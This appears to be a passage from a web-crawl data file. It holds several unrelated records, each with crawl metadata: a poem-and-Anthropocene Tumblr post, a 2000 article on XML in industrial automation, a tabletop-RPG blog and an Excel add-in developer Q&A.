be unheard.
Ann Marie Bissessar
(Professor, Public Management)
[email protected] | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9806466698646544}", 'metadata': "{'Content-Length': '194428', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:XTFKTKP4EOTZDKKFVZYTOVFX4IQRLI66', 'WARC-Concurrent-To': '<urn:uuid:62ad894d-be34-42e3-9ef0-5f1e382e5981>', 'WARC-Date': datetime.datetime(2015, 1, 25, 4, 2, 6), 'WARC-IP-Address': '162.159.248.123', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:4JPBLVP4V55MT27YDNDVJEGFC53IYAG2', 'WARC-Record-ID': '<urn:uuid:b9e1716c-ce54-4f28-8551-88a704dfc7b1>', 'WARC-Target-URI': 'http://www.guardian.co.tt/lifestyle/2014-05-25/rape-silent-cry', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:06c5c44c-af17-4c15-bb7f-17243e16a79a>', 'WARC-Truncated': 'length'}", 'previous_word_count': '1003', 'url': 'http://www.guardian.co.tt/lifestyle/2014-05-25/rape-silent-cry', 'warcinfo': 'robots: classic\r\nhostname: ip-10-180-212-252.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-06\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for January 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.09158426523208618', 'original_id': '3b1f7c90f6feb1265b5a58256864163cb30a1b5730ab438b01c31c542bb06392'} |
“A planet doesn’t explode of itself,” said drily
The Martian astronomer, gazing off into the air—
“That they were able to do it is proof that highly
Intelligent beings must have been living there.”
- John Hall Wheelock
From Ron Scranton’s op-ed in The New York Times:
There’s a word for this new era we live in: the Anthropocene. This term, taken up by geologists, pondered by intellectuals and discussed in the pages of publications such as The Economist and the The New York Times, represents the idea that we have entered a new epoch in Earth’s geological history, one characterized by the arrival of the human species as a geological force. The Nobel-Prize-winning chemist Paul Crutzen coined the term in 2002, and it has steadily gained acceptance as evidence has increasingly mounted that the changes wrought by global warming will affect not just the world’s climate and biological diversity, but its very geology—and not just for a few centuries, but for millenniums.
Earth’s destruction through natural catastrophe or, as the poem imagines, nuclear disaster is not mutually exclusive. We tend to imagine nuclear devastation as a product of war, of fat fingers on red buttons in times of conflict, but, as the tsunami that struck the Fukushima power plant showed, a natural disaster can cause a nuclear one, no MAD men needed. The Martian astronomer’s belief in our intelligence seems even more ironic when we don’t even realize what it is that will destroy us. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '28', 'language_id_whole_page_fasttext': "{'en': 0.9538459777832032}", 'metadata': "{'Content-Length': '30645', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:JXGHTNX4H2BHW4NPZ5X5TSMIWXEHRG6H', 'WARC-Concurrent-To': '<urn:uuid:5c4c613b-a6a6-4c5c-9ae4-f9b1b9b57ffe>', 'WARC-Date': datetime.datetime(2014, 3, 11, 22, 49, 3), 'WARC-IP-Address': '66.6.40.58', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:BJJH7H4PD6MCS4GNMT7VHARYCWSIKBCU', 'WARC-Record-ID': '<urn:uuid:bcd7dee6-743e-4fee-93be-fc5a7162cffc>', 'WARC-Target-URI': 'http://musique-concrete.tumblr.com/post/66832376795/earth', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:7bc05e4e-0c75-4cff-88d0-2da09738bd05>', 'WARC-Truncated': None}", 'previous_word_count': '257', 'url': 'http://musique-concrete.tumblr.com/post/66832376795/earth', 'warcinfo': 'robots: classic\r\nhostname: ip-10-183-142-35.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-10\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for March 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.04771459102630615', 'original_id': 'd2bbbee1263bd49c2cc6a805b4c3c14cb29485c23674e0ec7072da3bb7a05ae0'} |
Bookmark and Share
1 August 2000
XML Reaches Factory Floor's Automation Islands
This language will impact interoperability so significantly, its use will skyrocket.
By John Bono
Internet-driven communication tentacles, like the next-generation foundation technology called extensible markup language (XML), reach all the way to the factory floor's automation islands.
Driven by e-commerce demands and the unstoppable Internet, vendors develop—literally overnight—next-generation industrialized business software, including its methodologies and best practices. Emerging industrial-automation standards and products embrace this new generation, which you can already see coming, even as users briskly deploy distributed-object platforms and component technologies into factory automation spaces.
XML eliminates the need for programmers to write yet another protocol parser when an off-the-shelf XML parser is used. Schemata written in XML provide the true ability for systems to interact. Those are now being made open and hopefully will standardize quickly.
E-technologies already greatly influence standard enterprise operations. Companies tightly tie the technologies into supply-chain operations and even core manufacturing processes. Business-to-consumer (B2C) and business-to-business (B2B) communications reach right into the heart of businesses and extract information such as the number of units of a stock item and shipping location of products enroute to consumers.
When dealing with new technology, though, risk is high and answers unclear. That would be the case regarding whether to implement XML today. But there is strong momentum pushing XML into the factory.
Times, They Change
Time has a way of providing easy answers to the right technology to implement as everyone implements the popular choice.
Once, you had to decide whether an embedded controller should support token ring, LANtastic, or Ethernet; now Ethernet is the obvious choice. On a project with an Ethernet interface, debate formerly ensued for support for DecNet, IPX, Named Pipes, or TCP/IP; now TCP/IP is the obvious choice.
On yet another project with Ethernet and TCP/IP, participants struggled with the decision to support File Transfer Protocol, proprietary socket communications, or Hypertext Transfer Protocol (HTTP); now HTTP is easiest.
More recently, I've been involved in a distributed common object model (DCOM) vs. common object request broker architecture (CORBA) "object war" discussion, where there is no 20/20 hindsight yet. (Surprise: It appears to be simple-object access protocol, or SOAP.)
Today's Typical Architecture
We have widespread use of Ethernet and TCP/IP in embedded systems now.
Process controllers encapsulate proprietary and/or serial buses to consolidate data and control operations into OLE for process control (OPC) servers. Those servers are exposed to the network and interfaced via DCOM. The OPC clients can show the operation of multiple process controllers aggregated into an end-to-end factory operation. Using Windows CE for the process controller and Windows NT for the data, the concentrating OPC client system makes for a well-integrated, standard way to produce custom manufacturing applications.
It's never been this easy, we think—until reality strikes.
Often, CE is too slow for the process control application. This forces you to select a different operating system (OS). Without Windows 98, NT, or CE, you can't do DCOM. Even with CE, versions prior to 3.0 don't support DCOM. That means you must use a third-party add-on such as Intrinsyc's deviceCOM, used by most OPC vendors.
Of course, you may already have non-NT systems doing process-flow management, so DCOM is out again.
When you do get hardware and protocols in place, you'll find out next that not all OPC clients are compatible with all OPC servers. Cross-vendor debugging is difficult, to say the least. The OPC specification is huge and very complex. If you need a custom OPC server, you would be way ahead to purchase a OPC kit from one of the OPC supporters such as Intellution, PC Soft, Rockwell, Iconics, or Intrinsyc.
So, yes, it's never been this easy—but it's still not easy.
E-Commerce Happenings
With the hype, it has been impossible to miss the ongoing Internet revolution.
Much of the underground revolution centers around the infrastructure of e-commerce's B2C/B2B process improvements. However, while getting less press, there is also a strong application-to-application process change under way called enterprise application integration. All this adds up to automating business inside and outside the company walls.
Examples abound of XML-based initiatives. SAP introduced its distributor/reseller management package for supply-chain management, stating that XML is the integration key for all of its e-business efforts. Microsoft supports the BizTalk-protocol initiative and launched its Web Programming initiative. The United Nations and Open Access Same Time Information System (OASIS) are developing ebXML, an international e-commerce standard. Electronic data interchange (EDI) is moving to XML, thanks to the efforts of the XML/EDI Group. RosettaNet is implementing supply-chain e-commerce for electronic components. IBM is backing trading-partner agreement markup language (tpaML) for electronic contracts.
The new Microsoft BizTalk 2000 server product recognizes that companies' information technology (IT) systems cannot change overnight. The product provides sophisticated remapping among different protocols, such as EDI, flat files, and BizTalk. The BizTalk server could tie supply-chain e-commerce protocols to factory-automation protocols.
Schema Repositories
You can easily produce XML schemata that describe how other companies communicate with your device or system. Schemata exist for inventory counts, pick lists, bill of materials, receivables, product inspections, and more.
To make it easy for others to find your schema and vice versa, Web sites have sprung up to hold and index these personal schemas. Additionally, standards organizations encourage companies to standardize on one particular schema for a given transaction type. For instance, there is no need for each company to produce a different schema for each purchase order when they will all have 99% of the same functionality.
At, you can publish BizTalk-compatible schemata. You can also download any other schema someone else has published (downloading existing schemata saves time compared with developing them). Presently, more than 375 schemata reside there, including a large set from the Open Applications Group.
OASIS hosts a huge schema repository at IBM uses it for its tpaML schemata. The Machinery Information Management Open Systems Alliance, or MIMOSA, an organization advocating open interfaces for equipment-condition monitoring, also participates.
Future IT Architecture
Why will XML play a major role in the future of IT systems, and why will the e-commerce use of XML drive down onto the manufacturing floor?
Looser coupling of products. E-commerce embraces XML because it makes it easier to integrate systems among companies. Within a company using products from different vendors, the same integration benefit exists. With XML as the protocol, you debug communications problems more easily. The document-type definition, which defines the particular XML schema, often pinpoints a protocol violation by simply running the real data message through a validating XML parser.
Lower prices. Changing from one manufacturer's product to another will not necessarily require changing the communications protocol. That encourages competition. Also, because you don't need to use a specific OS for a device, selection cost trade-off is open for consideration.
More flexibility. Unlike DCOM and OPC, XML is OS independent, so any embedded controller with an Ethernet connection can output XML. A process controller can change manufacturers, OSs, programming languages, and more, and as long as the XML content stays the same, the new system fits just like the old one. Also, there is more architecture flexibility when you route a given XML message to single or multiple data-collecting systems.
Easier data access. All major SQL database products are changing to accept XML-based queries and produce XML-based results. This means a simple embedded device could reach into the heart of a corporate database and extract information it needs without having structured query language and Open Database Connectivity drivers. Or in reverse, reporting software could reach into a process controller to determine when a tool needs replacement and roll that data into top-level financial reports.
New applications. With access to corporate data, lowest-level factory devices can now run new applications not possible before, such as tracking personnel time allocated to production use vs. maintenance of a machine.
Automated maintenance. Using XML and other e-technologies such as Web servers and browsers, you can perform maintenance functions routinely. For instance, you can download new specifications to a tool to handle a new type of material with slightly different properties or download a new control program when changes require substantial operational control differences. Another possibility: The controller periodically generates operational statistics that go directly to a central corporate database, bypassing layers of protocol-conversion computers and making them unnecessary.
Object Conversion
An OPC Foundation committee works to provide OPC communication functionality on top of XML. This means devices using OPC would not need to support DCOM, even though they still do remote object access.
The same thing in more general form is being proposed with SOAP, first drafted by Microsoft. IBM helped draft and publicly endorses Version 1.1 of SOAP.
That protocol does object-oriented remote procedure calls using XML. Both DCOM and CORBA require their own byte-level formats, but SOAP specifies object connections in XML. That means a COM object could interface to a CORBA object using SOAP as the neutral protocol between them.
Using SOAP, any device can call any other device's services to retrieve information or set parameters. Because these are XML transfers, the devices' OSs, programming languages, and internal structures don't matter. For this reason, SOAP will become a very hot technology in the next generation of devices and process monitors.
Some people claim SOAP marks the end of the component conflicts. Maybe, but it doesn't provide everything available through the direct use of DCOM or CORBA. Nevertheless, SOAP will likely be a major factor for automation due to its operating system, object model, programming language, and processor independence.
Challenges to XML Ubiquity
Several things need to occur before XML-based architectures become universal.
Schema standardization. The OPC/XML group started work, but many other non-OPC protocols also need definition. With many groups developing e-commerce standards, there's a shakeout period coming.
Support tools. Embedded systems will need XML tools to make protocol use easy. For CE systems, BSQUARE produced a CE XML developer's kit and a CE Transaction Builder for BizTalk. Microsoft produced a free XML jump-start kit for developing XML on NT, specifically targeting BizTalk development. Also, Microsoft made a major commitment to XML in the next generation of tools and products to support its Next Generation Window Services initiative. Other freeware/shareware tools exist, such as XML editors that highlight XML syntax as you write schemata from scratch.
Discovery standards. Discovery is the process whereby a device announces its presence and what services it provides. Universal Plug and Play uses the proposed e-standard simple-service discovery protocol. Java systems would typically use the Jini discovery mechanism. Salutation is an independent protocol that supports discovery.
Maintainance standards. Universal plug and play allows remote control of a device using a Web server in the device and a remote browser as a user interface. Intrinsyc also provides a similar product for CE called deviceRMS. For automatic software updates of deployed systems, BSQUARE has CE Remote Updater, which is an XML command-driven product.
Meeting these challenges makes XML, while not solving the whole interdevice communications problem, a permanent and widespread fixture on the factory floor. IC
Author Information
John Bono is the engineering director for enterprise products at BSQUARE Corp. in Bellevue, Wash., a firm specializing in Windows-powered embedded systems.
Return to Previous Page
Read questions answered by our experts or join the email list. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '5', 'language_id_whole_page_fasttext': "{'en': 0.8981247544288635}", 'metadata': "{'Content-Length': '39346', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:WIZ7KZNUORMYX32V4UFN37KHAZ7MSCWO', 'WARC-Concurrent-To': '<urn:uuid:d1ba0264-22a6-45c2-adce-68fd9f188a77>', 'WARC-Date': datetime.datetime(2014, 3, 10, 16, 7, 48), 'WARC-IP-Address': '74.213.156.76', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:B2KQYHYNUWBU7DUXQEVPGKME47P6QXXR', 'WARC-Record-ID': '<urn:uuid:0305a4a1-0feb-431d-b850-08386f6ebdd2>', 'WARC-Target-URI': 'http://www.isa.org/InTechTemplate.cfm?Section=Communities&template=/TaggedPage/DetailDisplay.cfm&ContentID=14964', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:4aa9b1e1-8119-482e-80ef-0c7888b686eb>', 'WARC-Truncated': 'length'}", 'previous_word_count': '1864', 'url': 'http://www.isa.org/InTechTemplate.cfm?Section=Communities&template=/TaggedPage/DetailDisplay.cfm&ContentID=14964', 'warcinfo': 'robots: classic\r\nhostname: ip-10-183-142-35.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-10\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for March 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.02245122194290161', 'original_id': '0dcd202d61bbe5a1782850798bc757d46f786ba070ece771ff447f035bc6ccd7'} |
Friday, 19 April 2013
Tuesday, 9 April 2013
New Arrivals, Dropzone Commander also Little Mans
Tuesday, 26 March 2013
Six Scenario Seeds From BuildADungeonFromMe
This is the sort of thing I intended BADFM to do. Hit the random button and get inspired.
ONE - The final room of the alien shrine. While appearing to be sunlight filtering through the window in the roof, there is only solid rock (or desert sand) for hundreds of feet, if not miles, above. The picture window is in fact a minor warpgate that only permits light to travel through it is transmitting sunlight from a far distant star, perhaps from the alien civilisation's home solar system.
Research suggests that if all the engraved grooves in the walls are filled with a mix of fat and blood from intelligent species, the Featureless Goddess will come to life and grant the performer of the ritual one (and only) question guaranteed to be answered correctly. If the question cannot be guaranteed to be truthful it is believed that reality will in fact shift to match the answer. Clever PCs may be able to use these unanswerable questions to achieve Wishes.
(For example - When will Bountcrass the Usurper die? Since that is not known, an answer of "in ten years to the day" will change reality - Nothing can make Bountcrass die before that date, nothing can prevent his death on that date).
TWO - A Chaos Warrior of the Cult of The Chimaera of Scorpion and Man. It is of vital spiritual importance to these Chaos Warriors that their mortal remains be fed to the temple scorpions, accordingly cult members will go to any lengths to recover their fallen and return what remains of them to the Feeding Pits in their hidden temple deep in the desert. This is undertaken in the hope that one day the scorpions fed upon such will give birth to their Messiah, a hybrid of Scorpion and Man, the titular Chimaera. Somewhat predictably their temple/dungeon is quite heavy on the Dromopoda theme.
THREE - Cranial Parasite. A small grub that nests and grows within the brain cavity of severed heads that still possess a large degree of their original brain matter. Feeding upon the latent psychic energy within, the grub rapidly grows a size commensurate with the skull, growing tentacles with which to move and interact with it's environment and a large, lamprey-like mouth in the original owners jaw.
It's MO is to fight from ambush, dropping upon it's prey and sucking blood until it's prey is dead. It will then repeatedly vomit it's virulent stomach acids upon the neck of the victim until the head is severed, planting a child grub within the head before looking for new prey.
In regions where the Cranial Parasite is known and feared, most cultures practise cremation to avoid the spread of them.
FOUR - Monsieur Guillotine.
AC5, HD3, Att - 2 fists + charm-like effect, DMG - d4/d4, M12, AL:C, Usual undead immunities. Turn as Wight.
A bizarre magical hybrid of guillotine and animated skeleton. Upon encountering living beings that can be killed by decapitation, Monsieur Guillotine will attack while issuing a strange chanting noise. Each enemy who hears the noise must Save vs Spells each round they remain in earshot of MG or sink to their knees in a fugue-like state, totally unable to defend themselves or take any action.
Once all enemies are in a fugue-like state (and those that resisted are dead or have fled), on each subsequent round a random victim will raise and lay him or herself down in the guillotine (one round to perform). On the next round, the guillotine will descend and slay the victim (no save).
FIVE - Lord Treasure-Stomach. Believed by legend to be a narcissistic Earth Elemental who caught sight of his own reflection in the lake and froze in position unable to tear his eyes away. Furthermore it is believed that such creatures exist on a diet of valuable gems that stay secreted in their stomachs and that should the lake ever be drained Lord Treasure-Stomach will awake in a murderous rage and lay waste to the area. Locals will go to nearly any lengths to avoid the risk of adventurers trying to wake him in order to see if the gem diet legend is true.
SIX - Morkhoon the Death-Writer. First you have to locate this ancient, withered undead beast. Then you have to pay his grim price which he will tell you in staccato hisses of a volume barely audible to the human ear. This price varies by job and probably by whim of Morkhoon. Then he will prick himself and draw his thin, black blood and write the name of your target upon his wall and furthermore your name alongside it. The target will be dead within a year and a day. Morkhoon never fails and your name will be alongside your guilty deed for ever. Morkhoon knows who requested the assassination and will always draw the name of the guilty party - it is no use sending a catspaw or delegate to request your dirty work. Amongst the names of the guilty are those of many Kings and Emperors who thought that slaves, servants and messenger boys would be taking the rap for them.
Sunday, 24 March 2013
Death Frost Doom in a Black Country
Yeah, it's all my fault - no sooner do I print out and start to bind my PDF of Death Frost Doom then the snow sweeps in and paralyses the UK. Sorry. If it makes you feel any better I slipped and fell on the side of my arse walking back from Tescos today and Das Coopwagen will almost certainly be stuck on the drive for much of next week.
I won't bother reviewing DFD because it's been out a few years now and basically everybody else has already done so. I quite like it, it's almost scrupulously fair (which will be returned to later) and has a nice atmosphere. However there is one word that breaks it for me.
That word crops up as early as page 10 and is "susurrus".
Now, I already know what that word means. This is because I had to look it up after encountering it back in White Dwarf 9, specifically Albie Fiore's classic three-and-a-half-page 1st level D&D dungeon The Lichway from 1978. It's not like The Lichway is a famous dungeon or anything, nothing like something mentioned by people like Pterry as being the setting of the first game of D&D he ever played in.
So yeah, DFD is basically a rewrite of The Lichway. I think a lot of people have already noticed this and commented upon it so I'll just add this - LOTFP's Tower of the Stargazer is basically a rewrite of the Beacon at Enon Tor from IMAGINE 1 (April 1983). So there's previous here.
Basically the big problem I have with this scenario (and to be honest, it's the only major one) is that as soon as the word "susurrus" is mentioned, two things happen.
1 - Somebody says "what's that mean?" or
2 - Somebody blinks and thinks "Shit, this is a Lichway rewrite. This time there might actually be a Lich".
So that's problematical. It's a further problem in that the situation is slightly different in the two scenarios, but Lichway's is, I think, superior. To elucidate;
In DFD, a thorny plant blocks entrance to room 22. Air travelling through it's expanse makes the susurrus noise that keeps the undead "asleep". The players will just regard this as a problem to be brushed aside or, worse still, will be sagely wondering if the susurrus noise throughout the dungeon complex is, you know, maybe just maybe keeping the undead asleep. Because that Might. Just. Happen.
(This is what I mean by almost - knowledge of just how bad removing an irritating loads of brambles could be just isn't guessable and if it is - well we all know which WD scenario your players are familiar with...)
In Lichway, a beast called the Susurrus is kept in a cage over a secret trapdoor (yeah, that's a spoiler. The scenario is from 1978 FFS) over the secret treasure (ditto). It lives off air which it pulls through a series of resonant chambers in it's exoskeleton producing the susuruss noise that keeps the undead "asleep". It doesn't actually block any passage through it's chamber. It lives off air so has no reason to attack the PCs unless they have a naked flame which it detests seeing as how a naked flame burns up all the oxygen and is a direct competitor for resources. This makes sense. There is also a bullroarer in the dungeon complex specifically made to control the beast.
So the Lichway sets up a situation whereby the PCs don't actually need to dispose of the Susurrus and probably have to go to some lengths to do so (it's 8HD, they are 1st level) but intelligent play will certainly show them a way to "solve" the "puzzle". DFD just gives them an annoying briar to remove in order to get access to a room that will then fuck them up for doing the obvious thing which is a situation compounded by the fact that in the optional "go to dungeon on quest for McGuffin found in one room" the DM is supposed to place it in the room blocked off by the Susurrus plant.
However, that's the only part I dislike. So, thinking about it while on the household chores this afternoon I came up with the following take. Drop the thorny susurrus plant and introduce
Now we have a wizened old immortal, perhaps one of the very first members of the cult back in Ye Olde Days. He sits in room 22 playing a bone flute. This can be heard everywhere in the dungeon that the original susurrus could. He has sat there since time immemorial playing his bone flute very badly, awaiting the day that a new Grandmaster of the cult will arrive and declare that is time for HELL TO VOMIT FORTH IT'S FILTH. This has never happened in the past. But the eschatology of the cult says that it will one day. Maybe the Grandmaster doesn't know he's the Grandmaster. Maybe he was living the carefree life of a murder hobo dungeon bastard right up until the point where he made the music stop. Who knows? Devan-Ku moves in mysterious ways.
If the PCs try to talk to him he will carry on playing his flute. Should they make moves to attack him he will stop, ask "Are you sure? Are you really sure?" and if they are sure he'll just shrug and let himself be hacked down (1hp which should shock and worry any player who thought that this was THE BIG END OF LAST LEVEL BOSS and was preparing accordingly).
Another tiny problem I have is that there is a chimney up from room 22 clearly intended to be an emergency exit from, basically, the shitstorm that the PCs have just caused. This is claimed to be difficult to find from the surface (i.e. you must use DM's fiat to stop them finding it or the scenario will be fucked) but as we know, what is intended purely as an exit sometimes get used as an entrance as well. The chimney is partly blocked by susurrus brambles but the scenario is quiet on what exactly it would take to clear this and what, if any, this effect would have upon the susurussy noise. It strikes me that this was put in more in hope than expectation that the PCs don't find it. A bit scruffy.
Also why would you have a secret door in room 22 that requires a human sacrifice to open (this is good), alongside another secret door that, err, doesn't require a human sacrifice to open and leads to exactly the same corridor? I would cut out the linking N/S 10' of tunnel that links room 23 to the likes of rooms 24, 25 etc. or have the ritual open both.
But I like this scenario. If I were ever to get a game on, I'd happily run either as an introductory game but I'd have to prep players before running DFD that this is a little bit different to the more run of the mill D&D game.
Friday, 15 March 2013
Just Two Members of the Horde of Goreshitter
Firstly, a frank and honest admission of some shocking 'Eavy Metal heresy.
I like gloss varnish.
I especially like gloss varnish on 28mm figures.
My excuse for this is that some of the first miniatures photography I saw in White Dwarf was the work of Aly Morrison and they were slathered in rock hard gloss varnish. I loved the effect, the sheen and the porcelain-like finish and it was massively inspirational upon me. Gloss used to be quite fashionable up until the early 1990s but then it went away in favour of the almost maniacal "must be flat and reflect no light" look which was probably inspired by the increasing use of the black undercoat.
Anyway, I gloss all my 28mm. I even like the tactile feel when they are picked up.
Unfortunately this makes photography of my toys extremely difficult. Anyway here's two that I managed to snap via the iPhone without looking utterly shit.
Hathroll Stone Ommer, Asgard Miniatures Half-Troll with Hammer, pretending to be a Runequest Broo Oldhamster Chaos Beastman. I wanted to use this model because Asgard is Bryan Ansell's old company although I actually bought this as a reissue when Tabletop Games owned the moulds. I had a go at a traditional Blanchitsu "Orange Ogre Face" on the shield, but in red to match the red-and-yellow-ochre colour scheme that the rest of the warband has. Unfortunately the model is far too big to fit on a 25mm x 25mm base so I've double-based it - the frontage is the correct-for-Oldhamster 25mm but twice the depth as if it were what the kids all call a "unit filler" these days. Groundworking will be done all at the end of the project to keep it consistent across all models.
Yak Gotegobla, Citadel Miniatures Beastman Champion. I was a bit unsure about whether this model fitted in with the Oldhammer ethos being, to my mind, from the modern, rubbish period. But then I realised that the copyright date on the slottabase tab was 1995 which is obviously a hell of a lot closer to the magical year of 1987 then it is to the modern day...
So it gets a pass and gets to lead Göreshitter's Beastman unit Göreshitter's Shitters of Göre (all 5 of them). I tried to go all "limited palette" on this one, it's possibly ended up being a bit too subtle.
I do have other members of the warband painted up, unfortunately the gloss varnish and uneven lighting in the flat (fuck you shitty modern energy saving bulbs) meant that the pics aren't worth posting.
Wednesday, 13 March 2013
Been Quiet Recently
Been quiet recently. The reason for this is that I'm following a self-imposed curfew from VDU use after 10 at night in the interests of combating insomnia. So no PC, iPhone games, DVDs or vidya after 10 which is cutting the amount of time I spend online.
Despite this, the Rogue Trader game at Oldhammer weekend is go go go, scheduled for Sunday 1st September at Foundry in Nottingham. You can find the thread and rules and such like at the B.L.O.O.D. forum (no idea what that acronym stands for) here.
Anyway pics of some toys that will no doubt show their faces at Foundry.
Sunday was the West Midlands Military Show at Wolverhampton which is the same show that used to be based at that run-down secondary school in Walsall just off J10. Despite the name it's 90% wargaming with the balance being made up from displays by local kit modellers, a re-enactor or two and a couple of Second World War US Army vehicles.
These days, with the decline of the small "club open day" show this is one of only two shows I attend, the other being the show that used to be called Sandwell Skirmish but then moved out of Sandwell and into Brum which is held in December.
I picked up a few bits and pieces, mainly for the Oldhammer 40,000 game. I saw nothing of RPG interest, the usual Bring and Buy stall was pretty desolate and devoid of much of interest. I think this is probably the continuation of the decline of the B&B concept (once upon a time being the only real reason to attend smaller shows) it's market share having been decimated by eBay and a lot of tales of theft from stalls. That's usually where I pick up RPG bargains but nothing of interest this time.
On the subject of RPGs I finally got around at looking at the PDF download of 1977 vintage Tunnels & Trolls (4th edition) that I downloaded back in November. Printed out and bound this now means that I have four copies of T&T across three different editions and I have never played any of them...
Friday, 1 March 2013
Oldhammer Game Proposal - Rogue Trader
WD112 had this announcement of a "Bring and Battle" Rogue Trader event at Games Day '89.
I'd swear that there was an earlier incarnation of this game at Games Day '88 using just Space Marines and presented as a sort of gladiatorial game for the title of Emperor's Champion but I can't find any evidence of such in White Dwarf back issues. I may have dreamt this but I'm fairly certain I didn't.
I'd like (if the interest is there which is where you guys come in) to run something similar at the Oldhammer bash at Foundry this August. Using the 1987 rules of course.
This would be a case of each player turning up with something that resembles a Space Marine tactical squad (loaners would be available although I imagine most people attending Oldhammer would be able to lay their hands upon 10 Space Marines - RT01s or modern it really doesn't matter) and pitching in - either as an "everyman for himself" thing or set up as two opposing table edges. I guess the format depends upon numbers really as I suspect the rules might fall apart if there are too many sides.
I envisage people being able to turn up and just join in as and when, re-joining in after being wiped out if they so fancy. An excuse to push some lead and plastic around and roll some dice in other words. We might keep score, the winner wins the adoration of his peers or muttered asides of "powergamer..."
But while inviting all and sundry to the gladiatorial games on the world of Ghun'Khryme-Kapitol there will be a few... say we say complications.
Which is to say that your GM (yours truly) keeps thumbing through Warhammer 40,000 - Rogue Trader and thinking thoughts like "hmmm... random Dinosaurs....", "hmmm... vortex missiles" and "hmmm... biowire. I remember that issue of 2000AD..."
In other words, lots of random events designed to stir things up and stop it being a Missile Launcher sniping party. And it might allow me to kill something as it looks like my Khornate warband in the RoC battle royale won't be achieving very much...
Any interest? Is it worth my while sorting the game out. Let me know here or on the Oldhammer Facebook page. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '380', 'language_id_whole_page_fasttext': "{'en': 0.9610280394554138}", 'metadata': "{'Content-Length': '114718', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:Q7VBLFV4SFKW6KN2DFIPRKCWIHBXQ33K', 'WARC-Concurrent-To': '<urn:uuid:08f6b5e8-1c55-4b7c-b864-bdd4b98a7f57>', 'WARC-Date': datetime.datetime(2013, 12, 13, 10, 46, 1), 'WARC-IP-Address': '74.125.228.108', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:YSMLEGIGZQCC22CFV3OYAMXE3NA5SWS3', 'WARC-Record-ID': '<urn:uuid:be507397-3d1b-4b53-b6cb-1b15368a2650>', 'WARC-Target-URI': 'http://fightingfantasist.blogspot.com/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:f4546b93-ae17-489f-9da3-13adcdbc6350>', 'WARC-Truncated': 'length'}", 'previous_word_count': '3660', 'url': 'http://fightingfantasist.blogspot.com/', 'warcinfo': 'robots: classic\r\nhostname: ip-10-33-133-15.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2013-48\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for Winter 2013\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.08565068244934082', 'original_id': '56e6524c3309a54071a4e36c6f4c9ed1696386facd096cdf87c5c4e841e97590'} |
Get excel cell value without UI update in Excel Addin Nodejs Api
The key problem is that in our native web app we have an MVC architecture where the calculation engine, controller and UI are separate so when we recalculate we do not need to update UI ("expensive" operation).
As an add-in we are bound by excel API and we cannot find a way to run a recalculation without having to refresh the grid.
Even if we turn off UI update, when we need to get the value in a cell the UI is forced to update.
We call api doNotUpdateScreenUntillNextSync() but in order to get updated values we have to call context.sync() that will update the screen.
Any idea how to get cell value without UI update in excel.
Thanks for the question.
Currently we only support context.sync level UI update suspend by Application.suspendScreenUpdatingUntilNextSync(). Details can refer to https://learn.microsoft.com/en-us/javascript/api/excel/excel.application?view=excel-js-preview#suspendApiCalculationUntilNextSync__
Based on your description, maybe you can get the original value in a cell and calculate it then store the value in somewhere else. Then to update it until you want to refresh the UI.
And if you do want a Excel session level UI suspend API, please submit the requirement at Github. Thanks!
Thank you for the response. I follow your instruction and buffer the ranges and call context.sync() only once.
But I have more than 24,000 range/cell buffered and when I call context.sync() in the end and excel literally hang and I see white space only. Even excel cells are not visible.
yes I do call app.suspendScreenUpdatingUntilNextSync()
can you share your gist to me to help repro and investigate the root cause? Thanks!
Here is the gist url use excel file added in comment section. https://gist.github.com/pkpatels/8b3bca619b39c78cb0bc09e18c8512c1 Thanks in advance
Thanks for sharing the info. We will take a look and back to the thread when have progress.
